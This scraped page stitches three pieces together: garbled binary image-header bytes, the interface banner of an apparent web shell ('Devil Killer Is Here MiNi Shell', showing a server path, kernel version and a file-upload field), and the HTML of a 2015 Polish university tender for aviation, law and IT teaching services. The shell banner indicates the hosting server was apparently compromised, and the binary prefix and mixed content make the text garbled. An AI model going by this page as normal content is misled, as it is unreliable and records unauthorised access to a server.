JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151028/289300-N-2015.html

<p class="kh_header"><b>Gliwice: Przeprowadzenie zajęć, konsultacji i egzaminów dla studentów nowego kierunku i nowych specjalności. Oznaczenie sprawy: OZ/U/15/34/MW.</b><br>
<b>Numer ogłoszenia: 289300 - 2015; data zamieszczenia: 28.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Śląska , ul. Akademicka 2A, 44-100 Gliwice, woj. śląskie, tel. 32 2371334, 2371335, 2371171, faks 32 2371171, 2372194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć, konsultacji i egzaminów dla studentów nowego kierunku i nowych specjalności. Oznaczenie sprawy: OZ/U/15/34/MW..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie zajęć dydaktycznych, konsultacji oraz egzaminów dla uczestników kursów specjalistycznych. Przedmiot zamówienia został podzielony na 9  zadań. 2. CPV: 80.30.00.00-7 Usługi szkolnictwa wyższego. 3. Termin realizacji: -  termin przeprowadzenia zajęć  do 30.11.2015 r., -  przekazanie Zamawiającemu do zatwierdzenia: listy obecności, sprawozdania, sylabusów oraz karty pracy. do 01.12.2015r. Przekazanie dokumentacji z egzaminów do 01.12.2015 r. 4. UWAGA. W pkt II.2) niniejszego ogłoszenia ze względu na możliwości techniczne wpisano datę zakończenia tj. 01.12.2015 r., natomiast obowiązujący jest termin wskazany powyżej.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie minimum 1 osobą zdolną do wykonania  zamówienia, która będzie odpowiedzialna m. in. za prawidłową realizację zamówienia i która:

w zakresie zadania 1,2,3,4,5
a) posiada co najmniej tytuł zawodowy mgr z dziedziny lotnictwo cywilne ,
b) posiada doświadczenie w prowadzeniu zajęć dydaktycznych o tematyce objętej przedmiotem zamówienia zakończonych egzaminem lub zaliczeniem w szkole wyższej przez co najmniej 2 semestry.

Wszystkie osoby realizujące przedmiot zamówienia muszą spełniać wymagania opisane powyżej.

w zakresie  zadania 6 
a) posiada co najmniej tytuł zawodowy mgr prawa ,
b) posiada doświadczenie w prowadzeniu zajęć dydaktycznych o tematyce objętej przedmiotem zamówienia zakończonych egzaminem lub zaliczeniem w szkole wyższej przez co najmniej 2 semestry.

Wszystkie osoby realizujące przedmiot zamówienia muszą spełniać wymagania opisane powyżej.

w zakresie zadania 7,8,9
a) posiada co najmniej tytuł zawodowy mgr z dziedziny informatyka ,
b) posiada doświadczenie w prowadzeniu zajęć dydaktycznych o tematyce objętej przedmiotem zamówienia zakończonych egzaminem lub zaliczeniem w szkole wyższej przez co najmniej 2 semestry.

Wszystkie osoby realizujące przedmiot zamówienia muszą spełniać wymagania opisane powyżej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">A) Wymagania dotyczące przedmiotu zamówienia jakie musi spełnić Wykonawca: 1. Zaoferowanie ceny i warunków realizacji zamówienia zgodnie z wymaganiami Zamawiającego: 1.1. Oferta Cenowa.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. 2. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski. 3. Dokumenty są składane w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (czytelny podpis lub podpis z imienną pieczątką opatrzony słowami za zgodność z oryginałem) tj. przez osoby reprezentujące Wykonawcę lub przez pełnomocnika upoważnionego do złożenia oferty w jego imieniu. Sposób reprezentacji musi być zgodny z właściwym wypisem z rejestru. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz w przypadku innych podmiotów na zasobach, których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów muszą być poświadczone za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty. 4. Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Wymaga się aby dokument ten złożony był w oryginale oraz aby jednoznacznie potwierdzał, że Wykonawca będzie dysponował wskazanymi zasobami w trakcie realizacji zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z wyżej przywołanym przepisem, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. Zamawiający nie wymaga, aby Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji zamówienia, przedkładał także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy określonym w pkt. III.4.2) niniejszego ogłoszenia. 5. W przypadku składania oświadczeń lub podpisywania jakichkolwiek dokumentów przez pełnomocnika wymagane jest dołączenie oryginału pełnomocnictwa do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego z podpisem mocodawcy lub kopii uwierzytelnionej notarialnie. 6. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Do oferty należy dołączyć stosowne pełnomocnictwo do reprezentowania podmiotów występujących wspólnie w postępowaniu o udzielenie zamówienia. Pełnomocnictwo to powinno być udzielone (podpisane) przez podmioty występujące wspólnie oraz złożone w formie oryginału lub kopii uwierzytelnionej notarialnie. Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający (przed zawarciem umowy) może żądać umowy regulującej ich współpracę. Wykonawcy składający ofertę wspólną ponoszą solidarną odpowiedzialność za wykonanie umowy. Wykonawcy występujący wspólnie mogą łącznie spełniać warunki, o których mowa w art. 22 ust. 1 ustawy. Każdy z Wykonawców występujących wspólnie musi z osobna spełniać warunki udziału w postępowaniu dotyczące braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, o którym mowa w art. 24 ust. 1. W przypadku przynależenia do różnych grup kapitałowych, każdy z podmiotów występujących wspólnie jest zobowiązany do złożenia stosownej listy podmiotów należących do grupy kapitałowej. 7. W przypadku gdy w złożonych dokumentach lub oświadczeniach podane będą kwoty wyrażone w innych walutach niż PLN, w celu dokonania oceny spełnienia warunków udziału w postępowaniu, Zamawiający zastosuje przeliczenie tych walut wg średniego kursu Narodowego Banku Polskiego (dalej: NBP) na dzień publikacji ogłoszenia o zamówieniu. W przypadku gdy na ten dzień NBP nie opublikuje średnich kursów walut, do przeliczenia Zamawiający przyjmie pierwszy opublikowany po tej dacie średni kurs NBP. Średnie kursy walut dostępne są na stronie internetowej NBP pod następującym adresem: www.nbp.pl</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Doświadczenie - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, z wyjątkiem poniższych przypadków:
a) zmiany terminu realizacji zamówienia ze względu na:
- przyczyny leżące po stronie Zamawiającego
- inne niezawinione przyczyny spowodowane przez tzw. siłę wyższą np. pożar, zalanie itp. 
b) poprawy jakości lub innych parametrów charakterystycznych dla danej części usługi, 
c) zmiany w kolejności i terminach realizacji zamówienia, zmiany w kolejności i terminach płatności (w tym płatności częściowe - jeżeli dotyczy) za realizację zamówienia w sytuacji, kiedy są one korzystne dla Zamawiającego,
d) obniżenie ilości/wielkości przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy, wynikające 
z zaistnienia obiektywnych przesłanek konieczności takiej zmiany,
e) zmiany (ze względów losowych, zdrowotnych lub innych) osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi kwalifikacjami zawodowymi, doświadczeniem, wykształceniem, o których mowa w SIWZ,
f) zmiany miejsca prowadzenia zajęć,
g) dostosowanie treści umowy do aktualnego stanu prawnego w przypadku zmiany obowiązujących przepisów. 
2. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę i nie stanowią zobowiązania Zamawiającego do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Śląska, Dział Zamówień Publicznych i Zaopatrzenia, 44 - 100 Gliwice ul. Konarskiego 18, pok. 511.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2015 godzina 11:00, miejsce: Politechnika Śląska, Dział Zamówień Publicznych i Zaopatrzenia, 44 - 100 Gliwice ul. Konarskiego 18, pok. 511.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Rozliczenie nastąpi na podstawie faktury/rachunku wystawionej na Politechnikę Śląską, 44-100 Gliwice, ul. Akademicka 2A po zakończeniu kompleksowej realizacji przedmiotu zamówienia. 
2.	Zamawiający zobowiązuje się dokonać zapłaty należności na rachunek Wykonawcy podany na fakturze/rachunku 
w terminie do 30 dni od daty złożenia faktury/rachunku i spełnienia warunków umowy.
3.	Przedmiot zamówienia jest finansowany na podstawie umowy UDA - POKL.04.01.01-00-386/09-00 z dnia 4.12.2009r. Otwarcie nowego kierunku studiów i nowych specjalności oraz organizacja specjalistycznych kursów w Politechnice Śląskiej wraz z systemem staży dla kadry akademickiej uczelni. Projekt realizowany w ramach Europejskiego Funduszu Społecznego Priorytet IV, Działanie 1, Podziałanie 1 Program Operacyjny Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Prawo Lotnicze i Procedury ATC I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje  przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Prawo Lotnicze i Procedury ATC I dla studentów V sem. specjalności Nawigacja Powietrzna studia stacjonarne I stopnia na Kierunek Transport. Celem zajęć jest poszerzenie wiedzy praktycznej uczestników na temat Prawa lotniczego i procedur lotniczych. Zajęcia muszą mieć formę ćwiczeń laboratoryjnych w ilości 30  godzin (1 godzina lekcyjna = 45 minut).
W ramach zajęć powstanie 1 grupa studencka (laboratoryjna), która będzie składała się maksymalnie z 18 osób. 2. CPV: 80.30.00.00-7 Usługi szkolnictwa wyższego. 3. Termin realizacji: -  termin przeprowadzenia zajęć  do 30.11.2015 r. -  przekazanie Zamawiającemu do zatwierdzenia: listy obecności, sprawozdania, sylabusów oraz karty pracy. do 01.12.2015r. Przekazanie dokumentacji z egzaminów do 01.12.2015 r. 4. UWAGA. W pkt 3) dot. tej części zamówienia, ze względu na możliwości techniczne wpisano datę zakończenia tj. 01.12.2015 r., natomiast obowiązujący jest termin wskazany powyżej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Człowiek, możliwości i ograniczenia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Człowiek, możliwości i ograniczenia dla studentów V sem. Specjalności Nawigacja Powietrzna studia stacjonarne I stopnia na Kierunek Transport.
Zajęcia muszą mieć formę ćwiczeń laboratoryjnych w ilości 30  godzin (1 godzina lekcyjna = 45 minut). W ramach zajęć powstanie 1 grupa studencka (laboratoryjna), która będzie składała się maksymalnie z 18 osób. 2. CPV: 80.30.00.00-7 Usługi szkolnictwa wyższego 3. Termin realizacji: -  termin przeprowadzenia zajęć  do 30.11.2015 r. -  przekazanie Zamawiającemu do zatwierdzenia: listy obecności, sprawozdania, sylabusów oraz karty pracy. do 01.12.2015r. Przekazanie dokumentacji z egzaminów do 01.12.2015 r. 4. UWAGA. W pkt 3) dot. tej części zamówienia, ze względu na możliwości techniczne wpisano datę zakończenia tj. 01.12.2015 r., natomiast obowiązujący jest termin wskazany powyżej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Człowiek, możliwości i ograniczenia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Człowiek, możliwości i ograniczenia dla studentów V sem. Specjalności Mechanika Lotnicza  studia stacjonarne I stopnia na Kierunek Transport.
Zajęcia muszą mieć formę ćwiczeń laboratoryjnych w ilości 30  godzin (1 godzina lekcyjna = 45 minut). W ramach zajęć powstanie 1 grupa studencka (laboratoryjna), która będzie składała się maksymalnie z 15 osób. 2. CPV: 80.30.00.00-7 Usługi szkolnictwa wyższego 3. Termin realizacji: -  termin przeprowadzenia zajęć  do 30.11.2015 r. -  przekazanie Zamawiającemu do zatwierdzenia: listy obecności, sprawozdania, sylabusów oraz karty pracy. do 01.12.2015r. Przekazanie dokumentacji z egzaminów do 01.12.2015 r. 4. UWAGA. W pkt 3) dot. tej części zamówienia, ze względu na możliwości techniczne wpisano datę zakończenia tj. 01.12.2015 r., natomiast obowiązujący jest termin wskazany powyżej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Przepisy i procedury lotnicze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Przepisy i procedury lotnicze dla studentów VII sem. Specjalności Mechanika Lotnicza studia stacjonarne I stopnia na Kierunek Transport.
